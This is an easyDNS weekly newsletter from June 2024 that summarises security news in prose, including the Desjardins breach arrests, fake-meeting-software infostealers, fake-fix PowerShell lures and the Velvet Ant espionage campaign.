Weekly Axis Of Easy #355
Last Week’s Quote was: “ The price good men pay for indifference to public affairs is to be ruled by evil men.” by Plato. Harry had the right answer first.
This Week’s Quote: “ Stop being moons. Stop living by reflected light. Get into action and convert yourself to a living sun.” By ???
THE RULES: No searching up the answer, must be posted at the bottom of the blog post, in the comments section.
The Prize: First person to post the correct answer gets their next domain or hosting renewal on us.
This is your easyDNS #AxisOfEasy Briefing for the week of June 17th, 2024 our Technology Correspondent Joann L Barnes and easyCEO Mark E. Jeftovic send out a short briefing on the state of the ‘net and how it affects your business, security and privacy.
To Listen/watch this podcast edition with commentary and insight from Joey Tweets, and Len the Lengend click here.
In this issue:
- Massive Data Breach at Desjardins Group Leads to Arrests
- Malicious Campaign Targets Cryptocurrency Users via Deceptive Virtual Meeting Software
- Mouse Jigglers and the Productivity Charade: Wells Fargo Fires Expose Flaws in Hybrid Work Monitoring
- Deceptive Cyberattacks: The Rising Threat of Malware Through Fake Fixes
- Unveiling Velvet Ant: A Stealthy Cyber Espionage Saga
Elsewhere Online
- Cyber Intrusions Reported at Tech Giants AMD and Apple
- Critical 911 Services Interrupted in Massachusetts by Firewall Mishap
- Adobe Commits to Ethical AI Training Practices, Artists Remain Wary
- Security Breach Alert as ONNX Targets Microsoft 365 MFA Protections
- TellYouThePass Ransomware Seizes Opportunity with Patched PHP Flaw
Massive Data Breach at Desjardins Group Leads to Arrests
Laval police recently apprehended three suspects in connection with a significant data breach at Desjardins Group, a Quebec-based credit union. The breach, which came to light in 2019, is considered one of the largest ever among Canadian financial institutions, impacting millions of customers.
Imad Jbara (33) and Ayoub Kourdal (36) face charges related to fraud, trafficking in identity information, and identity theft. A fourth suspect remains at large. The leaked data included sensitive details such as names, addresses, birth dates, social insurance numbers (SINs), and email addresses. Armed with this information, scammers gained temporary access to Desjardins’ login portal (AccèsD) and executed fraudulent transactions, resulting in an $8.9 million loss.
Desjardins was found negligent by the Superior Court of Quebec, leading to a more than $200-million settlement in a class-action lawsuit. Reports from the Office of the Privacy Commissioner of Canada and the Commission d’accès à l’information du Québec highlighted the institution’s failure to safeguard members’ personal and financial data. The breach originated from an employee within the marketing team who had unauthorized access to confidential information stored in shared directories.
As fraud reports continue to rise, authorities emphasize vigilance: never share personal or bank information without confirming the recipient’s identity. Desjardins has cooperated with law enforcement, but the incident serves as a stark reminder of the need for robust data protection measures.
Malicious Campaign Targets Cryptocurrency Users via Deceptive Virtual Meeting Software
Insikt Group, a cybersecurity provider, has uncovered a widespread malicious campaign targeting cryptocurrency users. The campaign revolves around Vortax, a deceptive virtual meeting software falsely marketed as an AI-powered alternative to popular video chat services.
Once installed, Vortax delivers three information stealers (infostealers) in cross-platform attacks. Of particular interest is the rare macOS infostealer called AMOS, which stands out due to its scarcity compared to its Windows counterparts. Researchers have identified connections between the Vortax campaign and a previous infostealer campaign targeting web3 gaming projects.
This escalating threat underscores the need for vigilance among cryptocurrency users. As the use of AMOS infostealer grows, the security landscape for macOS users may become increasingly vulnerable.
Hybrid work, where employees split time between office and home, has sparked a game of cat and mouse between employers and staff. Employers are deploying productivity monitoring software, presumably to address concerns about remote work dips. Employees are fighting back with mouse jigglers, cheap gadgets that fake cursor movement.
These jigglers, trending on TikTok and surging in searches by 2022, are a symptom of a broken system. Wells Fargo has responded to this trend by dismissing several employees within its wealth and investment management division, as reported by Bloomberg. These individuals were found to be using mouse jigglers to simulate keyboard activity, according to disclosures made to FINRA. The circumstances surrounding their detection and whether the misconduct occurred during remote or office hours remain unclear.
This situation underscores the challenges faced by employers in managing a workforce that is no longer centralized. While banks such as JPMorgan Chase and Goldman Sachs have been pushing for a return to pre-pandemic office routines, the emergence of mouse jigglers highlights the unintended consequences of remote work and raises questions about the effectiveness of stringent monitoring practices.
Deceptive Cyberattacks: The Rising Threat of Malware Through Fake Fixes
In a recent surge of cyberattacks, threat actors are utilizing deceptive tactics involving JavaScript to display counterfeit errors linked to popular applications like Google Chrome, Microsoft Word, and OneDrive. These fraudulent prompts coax users into copying and running a PowerShell script that masquerades as a fix but ultimately leads to malware deployment. A report from Proofpoint cautions about these attacks, noting their reliance on significant user interaction and the persuasive nature of the fake problems and solutions presented.
The attacks unfold through various schemes. One involves malicious scripts on compromised websites that trick users into executing a PowerShell script under the guise of installing a root certificate, which then downloads further malicious payloads. Another tactic overlays phony Chrome error messages on websites, prompting similar malware downloads. An email-based attack chain employs HTML attachments that imitate Word documents, directing users to install bogus extensions or run PowerShell commands that trigger malware infections.
These attack chains exploit the general lack of user awareness regarding the risks associated with executing PowerShell commands and the inability of Windows systems to intercept and prevent the malicious activities triggered by such code. The threat group TA571 is particularly active in experimenting with these methods, seeking to refine their approach and ensnare a broader array of victims.
Unveiling Velvet Ant: A Stealthy Cyber Espionage Saga
Sygnia’s cybersecurity experts have disclosed a prolonged and clandestine cyber-espionage operation by the Velvet Ant group, emanating from China, targeting a significant corporation in East Asia. The group demonstrated remarkable persistence, repeatedly evading detection and removal from the victim’s network by exploiting overlooked legacy systems. The report from Sygnia highlights Velvet Ant’s adaptability, as they consistently found new ways to maintain their presence within the corporate network despite discovery and remediation efforts.
Velvet Ant’s strategy involved deploying the once-popular PlugX remote access Trojans on outdated Windows Server 2003 systems, utilizing the Impacket toolkit for spreading laterally and executing commands on compromised machines. Sygnia’s initial expulsion attempts were met with Velvet Ant’s resurgence through backup malware hidden on legacy systems, indicating a sophisticated fallback strategy. The group also cleverly set up an internal file server to act as a command-and-control center, allowing them to continue their operations without external communication.
The campaign’s intricacy was further highlighted when Sygnia found backdoors on neglected legacy F5 Big-IP load-balancing systems, which were part of an abandoned disaster recovery initiative. These systems facilitated access to the internal command-and-control server. To thwart such advanced threats, Sygnia advises organizations to retire obsolete systems promptly and enforce rigorous monitoring protocols to close gaps that could be exploited by advanced persistent threats and nation-state actors for covert espionage operations.
Elsewhere Online
Cyber Intrusions Reported at Tech Giants AMD and Apple
https://www.infosecurity-magazine.com/news/threat-actor-amd-apple-breaches/
Critical 911 Services Interrupted in Massachusetts by Firewall Mishap
https://www.securityweek.com/massachusetts-911-outage-caused-by-errant-firewall/
Adobe Commits to Ethical AI Training Practices, Artists Remain Wary
Security Breach Alert as ONNX Targets Microsoft 365 MFA Protections
https://www.darkreading.com/remote-workforce/onnx-microsoft-365-accounts-mfa-bypass
TellYouThePass Ransomware Seizes Opportunity with Patched PHP Flaw
If you missed the previous issues, they can be read online here:
- June 10th, 2024: Canada’s Cybercrime Response Critically Deficient, Auditor General Finds
- June 3rd, 2024: Massive Google Leak Exposes Search Algorithm Mysteries and Legal Implication
- May 27th, 2024: Vulnerability in Apple’s Location Services Exposes Privacy Risks
- May 20th, 2024: YouTube Faces Surge In Phishing And Deepfake Scams
- May 13th, 2024: Malware Disguised As Popular Apps Targets Android Users